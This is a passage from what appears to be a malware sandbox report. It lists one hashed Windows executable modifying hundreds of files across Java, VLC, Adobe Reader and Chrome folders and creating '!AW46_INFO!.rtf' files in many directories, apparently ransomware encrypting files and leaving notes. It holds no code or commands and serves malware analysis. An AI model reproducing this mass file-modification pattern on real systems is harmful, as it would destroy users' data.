(x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\Templates\blank.jtp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Swift_Current 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Jujuy 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Moncton 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qatar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Irkutsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\setup.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Singapore 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kaliningrad 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\management\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Niue 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.bfc 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Monrovia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CST6CDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Darwin 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\chrmstp.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wallis 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\README.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.RSA 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson_Creek 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pohnpei 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Monticello 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfxrt.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\updater.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chicago 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Berlin 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.RSA 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tehran 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\St_Johns 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\PYCC.pf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\et.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmic.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Anadyr 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Mendoza 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Iqaluit 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\London 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Chagos 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Copenhagen 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Managua 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cancun 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{5DF2DCA9-BD54-4513-9B32-2C551D72B961}\83.0.4103.106_chrome_installer.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+7 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Seoul 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Atikokan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program 